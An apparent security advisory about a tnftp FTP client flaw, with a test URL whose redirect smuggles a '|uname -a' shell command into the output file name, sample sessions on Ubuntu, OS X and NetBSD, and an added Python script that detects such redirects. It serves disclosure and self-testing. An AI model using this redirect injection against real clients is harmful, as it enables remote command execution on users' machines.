
tnftp has a serious vulnerability

The tnftp FTP client is fairly old, but it's still widely used.

It ships with Red Hat's Fedora, Debian, Ubuntu, Suse, Gentoo, NetBSD, FreeBSD and Apple's OS X. It is often called from internal scripts (package managers, update jobs, cron jobs ...).

You can check if you are affected by pointing your ftp-client to

http://s2p.de/tnftptest

If the transfer prints information about your system (the output of uname -a), you are affected.

For example, on Ubuntu:

myhost > ftp http://s2p.de/tnftptest
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
100% |******************************************************************************************************************************************************************************************************************| 18699       69.93 MiB/s    00:00 ETA18699 bytes retrieved in 00:00 (59.04 MiB/s)
Linux myhost 3.2.0-69-generic #103-Ubuntu SMP Tue Sep 2 05:02:14 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

If you see something similar to
Linux myhost 3.2.0-69-generic #103-Ubuntu SMP Tue Sep 2 05:02:14 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
you are affected.

Mac OS X 10.9.5

$ ftp http://s2p.de/tnftptest
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
  0% |                                                                                                                                                                                |     0        0.00 KiB/s    --:-- ETADarwin burma.fritz.box 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64
ftp: Writing `|uname -a': Broken pipe

Darwin macbook.fritz.box 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64

NetBSD 4

> ftp http://s2p.de/tnftptest
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
  0% |                                                                                                                                                 |     0       0.00 KB/s    --:-- ETANetBSD foo.fritz.box 4.0_STABLE NetBSD 4.0_STABLE (GENERIC) #0: Sun Feb 24 17:08:14 CET 2013  root@foo.fritz.box:/mnt/src/sys/arch/i386/compile/obj/GENERIC i386
ftp: Writing `|uname -a': Broken pipe

NetBSD foo.fritz.box 4.0_STABLE NetBSD 4.0_STABLE (GENERIC) #0: Sun Feb 24 17:08:14 CET 2013  root@foo.fritz.box:/mnt/src/sys/arch/i386/compile/obj/GENERIC i386
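What the sessions above show is that tnftp derives the local output name from the last path component of the URL it ends up at after the redirect, and a name beginning with `|` is opened as a pipe to a shell command. The following script is an added example (not part of the original page or of tnftp) that mimics that name derivation so a redirect target, or a saved verbose ftp session log, can be checked for this pattern; the sample redirect with `%7C` assumes tnftp percent-decodes the whole segment, as it did with `%20` above.

```python
"""Flag redirect targets that tnftp would turn into a shell pipe."""
from urllib.parse import urlsplit, unquote


def tnftp_output_name(url: str) -> str:
    """Mimic tnftp's choice of local file name: the last component of the
    URL path, percent-decoded (e.g. "|uname%20-a" -> "|uname -a")."""
    path = urlsplit(url).path
    return unquote(path.rsplit("/", 1)[-1])


def is_pipe_output(name: str) -> bool:
    """A derived output name starting with '|' is run as a command."""
    return name.startswith("|")


def check_redirect(location: str) -> dict:
    """Evaluate a single Location header value."""
    name = tnftp_output_name(location)
    return {"location": location, "output_name": name,
            "dangerous": is_pipe_output(name)}


def scan_session(log_text: str) -> list:
    """Return the distinct dangerous URLs named in 'Redirected to' and
    'Requesting' lines of a verbose tnftp session, in order of appearance."""
    flagged = []
    for line in log_text.splitlines():
        for prefix in ("Redirected to ", "Requesting "):
            if line.startswith(prefix):
                url = line[len(prefix):].strip()
                if is_pipe_output(tnftp_output_name(url)) and url not in flagged:
                    flagged.append(url)
    return flagged


# Constructed sample session in the same shape as the ones shown on this page.
SAMPLE_SESSION = """\
Requesting http://s2p.de/tnftptest
Redirected to http://s2p.de/|uname%20-a
Requesting http://s2p.de/|uname%20-a
"""

if __name__ == "__main__":
    # Constructed sample: an encoded pipe (assumption: decoded like %20 above).
    for loc in ("http://s2p.de/tnftptest", "http://s2p.de/%7Cid"):
        print(check_redirect(loc))
    print("dangerous URLs in session:", scan_session(SAMPLE_SESSION))
```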

The ftp version on Mac OS X 10.9.5:

> ftp
ftp> status
Not connected.
...
Version: NetBSD-ftp 20060726
ftp> exit

NetBSD-ftp 20060726